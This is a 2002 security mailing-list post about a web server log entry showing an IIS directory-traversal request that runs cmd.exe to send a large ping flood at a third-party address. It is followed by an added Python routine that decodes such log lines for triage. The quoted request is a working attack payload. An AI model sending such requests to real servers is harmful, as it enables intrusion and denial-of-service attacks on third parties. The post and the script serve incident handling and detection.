Security Incidents
mailing list archives
Interesting new DDoS method?
From: "Keith T. Morgan" <keith.morgan () terradon com>
Date: Wed, 2 Oct 2002 10:16:03 -0400
Excerpt from webserver logs:
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ping%20-n%20666%20-l%2065500%20-w%200%2065.168.118.157 200
Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0)
We had several of these appear in the logs. Deciphering the command that was attempted, it looks like: ping -n 666 -l
65000 -w 0
It looks like someone's attempting to take advantage of code red / nimda infected (or vulnerable) servers to use as a
Distributed DoS. Quite clever. All one would have to do is sit and accumulate a list of machines that have attempted
to probe you for CR/CRv2/Nimda etc...
Scripting an attack like this would be quite simple. However, the machines that were probed here were not infected or
vulnerable.
Keith T. Morgan - CISSP, CCSE/CCSA, MCP
Terradon Communications Group
Office: 304.755.1324 x142
Mobile: 304.415.0238
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
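Added example, not part of the original post: a small Python log triage routine that recovers the command from requests like the one quoted above by percent-decoding the path until it is stable (%255c -> %5c -> \) and then decoding the query string. The function names, the "path status user-agent" field layout and the second and third sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, unquote_plus

# First line is the request quoted in the post; the other two are constructed.
SAMPLE_LOG = [
    "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ping%20-n%20666%20-l%2065500"
    "%20-w%200%2065.168.118.157 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0)",
    "/index.html 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0)",
    "/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+dir 404 -",
]

def decode_rounds(text, limit=4):
    """Percent-decode until the text stops changing; return (decoded, rounds)."""
    rounds = 0
    while rounds < limit:
        decoded = unquote(text, encoding="latin-1")
        if decoded == text:
            break
        text, rounds = decoded, rounds + 1
    return text, rounds

def analyze(line):
    """Return a finding dict for a cmd.exe traversal request, else None."""
    fields = line.split()
    if len(fields) < 2 or not fields[1].isdigit():
        return None
    path, _, query = fields[0].partition("?")
    path, rounds = decode_rounds(path)
    # Directory traversal that ends at the command interpreter
    if not (re.search(r"\.\.[\\/]", path) and re.search(r"cmd\.exe$", path, re.I)):
        return None
    # In the query, '+' stands for a space and %20 is a percent-encoded space
    command = re.sub(r"^/c\s+", "", unquote_plus(query))
    finding = {"status": int(fields[1]), "decode_rounds": rounds, "command": command}
    ping = re.match(r"ping\b(.*)\s(\S+)$", command)
    if ping:
        # Windows ping options: -n echo count, -l payload size in bytes
        opts = dict(re.findall(r"-(\w)\s+(\d+)", ping.group(1)))
        finding["ping"] = {"count": int(opts.get("n", 0)),
                           "size": int(opts.get("l", 0)),
                           "target": ping.group(2)}
    return finding

def scan(lines):
    """Analyze every line and keep only the ones that produced a finding."""
    return [f for f in map(analyze, lines) if f is not None]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The "target" field is the address the relayed ping would have been sent to, which is the detail to collect across entries when several of these show up in one log.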